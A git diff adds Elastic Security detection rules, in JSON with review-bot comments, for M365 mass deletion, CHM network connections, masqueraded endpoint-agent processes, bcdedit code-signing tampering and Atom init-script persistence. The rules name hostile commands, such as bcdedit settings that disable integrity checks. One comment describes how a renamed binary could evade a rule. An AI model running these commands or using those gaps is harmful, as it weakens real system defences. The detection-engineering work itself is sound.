"reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1485", + "name": "Data Destruction", + "reference": "https://attack.mitre.org/techniques/T1485/" + } + ] 
+ } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "b2951150-658f-4a60-832f-a00d1e6c6745_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_206.json b/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_206.json new file mode 100644 index 00000000000..1e4a87d050c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_206.json 
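Review bot: The query keys on the free-text value `event.action:"Unusual volume of file deletion"`, so the detection depends on the exact English title that the Microsoft side emits for this anomaly policy; any rename or localisation of that string would silently stop the rule from matching, and nothing in `setup` warns about that. Suggested addition to `setup`: `The query matches the literal alert title "Unusual volume of file deletion" as reported by Microsoft Cloud App Security; verify the title in your tenant if the rule stops firing.` I am inferring from the query that `event.action` holds the policy title — worth confirming against the o365 integration mapping.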
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies that a user has deleted an unusually large volume of files as reported by Microsoft Cloud App Security.", + "false_positives": [ + "Users or System Administrator cleaning out folders." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Unusual Volume of File Deletion", + "note": "", + "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:\"Unusual volume of file deletion\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b2951150-658f-4a60-832f-a00d1e6c6745", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Impact" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1485", + "name": "Data Destruction", + "reference": "https://attack.mitre.org/techniques/T1485/" + } + ] 
+ } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "b2951150-658f-4a60-832f-a00d1e6c6745_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_107.json b/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_107.json new file mode 100644 index 00000000000..4404ec755ef --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_107.json 
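Review bot: `note` is an empty string on this rule while `false_positives` already names administrators cleaning out folders, so an analyst triaging an alert gets no guidance on separating that case from T1485 data destruction; the other rules in this change ship a `## Triage and analysis` section, and a short one here (identify the account and the site or library affected, check for other MCAS anomalies on the same user, confirm with the user or owner before restoring) would be consistent with them. The tag `Use Case: Configuration Audit` also reads oddly for an Impact/data-destruction rule — `Use Case: Threat Detection` looks like the intended value, to be confirmed against the upstream rule definition.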
@@ -0,0 +1,126 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Compiled HTML files (.chm) are commonly distributed as part of the Microsoft HTML Help system. Adversaries may conceal malicious code in a CHM file and deliver it to a victim for execution. CHM content is loaded by the HTML Help executable program (hh.exe).", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Network Connection via Compiled HTML File", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\nThis rule identifies network connections done by `hh.exe`, which can potentially indicate abuse to download malicious files or tooling, or masquerading.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Examine the command lines for suspicious activities.\n - Retrieve `.chm`, `.ps1`, and other files that were involved for further examination.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - 
Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the 
system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"hh.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"hh.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\",\n \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\",\n \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\") and\n not dns.question.name : \"localhost\"]\n", + "references": [ + "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + 
"type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "b29ee2be-bf99-446c-ab1a-2dc0183394b8", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1204", + "name": "User Execution", + "reference": "https://attack.mitre.org/techniques/T1204/", + "subtechnique": [ + { + "id": "T1204.002", + "name": "Malicious File", + "reference": "https://attack.mitre.org/techniques/T1204/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.001", + "name": "Compiled HTML File", + "reference": "https://attack.mitre.org/techniques/T1218/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 107 + }, + "id": "b29ee2be-bf99-446c-ab1a-2dc0183394b8_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_110.json b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_110.json new file mode 100644 index 00000000000..8de0a6bcab5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_110.json 
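Review bot: The `cidrmatch` exclusion list covers RFC 1918 and the IANA IPv4 special-purpose ranges plus `::1`, `FE80::/10` and `FF00::/8`, but not the IPv6 unique-local range, so an `hh.exe` connection to an internal IPv6 host is treated differently from the same connection over IPv4; adding `"fc00::/7"` to the list would make the two address families consistent, assuming the intent is to exclude all internal destinations. This rule also omits `timestamp_override` and the `setup` text that the sibling rules in this change carry despite including `winlogbeat-*` and `logs-windows.sysmon_operational-*` in `index`; if that is deliberate for sequence rules it is worth a sentence in the rule, otherwise `"timestamp_override": "event.ingested"` should probably be added.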
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A suspicious Endpoint Security parent process was detected. This may indicate a process hollowing or other form of code injection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Endpoint Security Parent Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"esensor.exe\", \"elastic-endpoint.exe\") and\n process.parent.executable != null and\n /* add FPs here */\n not process.parent.executable : (\n \"?:\\\\Program Files\\\\Elastic\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\services.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault*.exe\",\n \"?:\\\\Windows\\\\System32\\\\wermgr.exe\",\n \"?:\\\\Windows\\\\explorer.exe\"\n ) and\n not (\n process.parent.executable : (\n \"?:\\\\Windows\\\\System32\\\\cmd.exe\",\n \"?:\\\\Windows\\\\System32\\\\SecurityHealthHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"\n ) and\n process.args : (\n \"test\", \"version\",\n \"top\", \"run\",\n \"*help\", \"status\",\n \"upgrade\", \"/launch\",\n \"/enable\"\n )\n )\n \n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b41a13c6-ba45-4bab-a534-df53d0cfed6a", + "setup": "## Setup\n\nIf enabling an EQL rule on a 
non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "b41a13c6-ba45-4bab-a534-df53d0cfed6a_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_111.json b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_111.json new file mode 100644 index 00000000000..81b1cd34742 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_111.json 
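Review bot: `index` includes `logs-system.security*` and `logs-windows.*`, but `related_integrations` lists only the `endpoint` and `windows` packages; the `b43570de-a908-4f7f-8bdb-b2df6ffd8c80_7` rule added in this same change uses the identical index list and additionally declares `{ "package": "system", "version": "^1.6.4" }`. If the `system` integration is a real data source for this rule, the entry should be added here so the Kibana integration check reflects it; if it was intentionally left out for this historical version, that is fine but worth confirming.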
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A suspicious Endpoint Security parent process was detected. This may indicate a process hollowing or other form of code injection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Endpoint Security Parent Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"esensor.exe\", \"elastic-endpoint.exe\") and\n process.parent.executable != null and\n /* add FPs here */\n not process.parent.executable : (\n \"?:\\\\Program Files\\\\Elastic\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\services.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault*.exe\",\n \"?:\\\\Windows\\\\System32\\\\wermgr.exe\",\n \"?:\\\\Windows\\\\explorer.exe\"\n ) and\n not (\n process.parent.executable : (\n \"?:\\\\Windows\\\\System32\\\\cmd.exe\",\n \"?:\\\\Windows\\\\System32\\\\SecurityHealthHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"\n ) and\n process.args : (\n \"test\", \"version\",\n \"top\", \"run\",\n \"*help\", \"status\",\n \"upgrade\", \"/launch\",\n \"/enable\"\n )\n )\n \n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b41a13c6-ba45-4bab-a534-df53d0cfed6a", + "setup": "## Setup\n\nIf enabling an EQL rule on a 
non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "b41a13c6-ba45-4bab-a534-df53d0cfed6a_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_7.json b/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_7.json new file mode 100644 index 00000000000..8e9888ee6ad --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_7.json 
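Review bot: The second exclusion is satisfied when the parent is `cmd.exe`, `SecurityHealthHost.exe` or `powershell.exe` and any element of `process.args` matches one of `test`, `version`, `top`, `run`, `*help`, `status`, `upgrade`, `/launch` or `/enable`, so a masqueraded binary named `elastic-endpoint.exe` launched from a shell with a trailing `status` argument would be suppressed, which works against the T1036.005 intent of the rule. If the exclusion is meant for operators running the real CLI, tightening it with the executable path, e.g. `process.executable : "?:\\Program Files\\Elastic\\Endpoint\\elastic-endpoint.exe"` inside that `not (...)` group, would keep the allowlist without extending it to arbitrary files of the same name; whether that path is the only legitimate install location needs confirming. As with the `_110` version, `index` names `logs-system.security*` while `related_integrations` does not list the `system` package.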
@@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to disable/modify the code signing policy through system native utilities. Code signing provides authenticity on a program, and grants the user with the ability to check whether the program has been tampered with. By allowing the execution of unsigned or self-signed code, threat actors can craft and execute malicious code.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Code Signing Policy Modification Through Built-in tools", + "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Built-in tools\n\nWindows Driver Signature Enforcement (DSE) is a security feature introduced by Microsoft to enforce that only signed drivers can be loaded and executed into the kernel (ring 0). This feature was introduced to prevent attackers from loading their malicious drivers on targets. If the driver has an invalid signature, the system will not allow it to be loaded.\n\nThis protection is essential for maintaining the security of the system. However, attackers or even administrators can disable this feature and load untrusted drivers, as this can put the system at risk. Therefore, it is important to keep this feature enabled and only load drivers from trusted sources to ensure the integrity and security of the system.\n\nThis rule identifies commands that can disable the Driver Signature Enforcement feature.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the command was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name: \"bcdedit.exe\" or ?process.pe.original_file_name == \"bcdedit.exe\") and process.args: (\"-set\", \"/set\") and \n process.args: (\"TESTSIGNING\", \"nointegritychecks\", \"loadoptions\", \"DISABLE_INTEGRITY_CHECKS\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b43570de-a908-4f7f-8bdb-b2df6ffd8c80", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1553", + "name": "Subvert Trust Controls", + "reference": "https://attack.mitre.org/techniques/T1553/", + "subtechnique": [ + { + "id": "T1553.006", + "name": 
"Code Signing Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1553/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "b43570de-a908-4f7f-8bdb-b2df6ffd8c80_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_106.json b/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_106.json new file mode 100644 index 00000000000..44ea633072d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_106.json 
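Review bot: The query matches any `bcdedit -set`/`/set` invocation whose arguments include `TESTSIGNING`, `nointegritychecks`, `loadoptions` or `DISABLE_INTEGRITY_CHECKS` without looking at the value, so `bcdedit /set testsigning off` (re-enabling enforcement after an incident) fires exactly like the disabling command; the investigation guide says the rule identifies commands that "can disable" DSE, so the False positive analysis section should say that remediation commands trigger it too, e.g. `- Re-enabling enforcement with the same utility will also match this rule; correlate with the preceding command to determine direction.` This rule also has `timestamp_override: event.ingested` and `winlogbeat-*` in `index` but, unlike `b41a13c6-ba45-4bab-a534-df53d0cfed6a_111` with the same index list, no `setup` text about the pre-8.2 `event.ingested` fallback; adding the same paragraph would keep the two consistent.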
@@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modifications to the Atom desktop text editor Init File. Adversaries may add malicious JavaScript code to the init.coffee file that will be executed upon the Atom application opening.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Persistence via Atom Init Script Modification", + "query": "event.category:file and host.os.type:macos and not event.type:\"deletion\" and\n file.path:/Users/*/.atom/init.coffee and not process.name:(Atom or xpcproxy) and not user.name:root\n", + "references": [ + "https://github.com/D00MFist/PersistentJXA/blob/master/AtomPersist.js", + "https://flight-manual.atom.io/hacking-atom/sections/the-init-file/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "b4449455-f986-4b5a-82ed-e36b129331f7", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
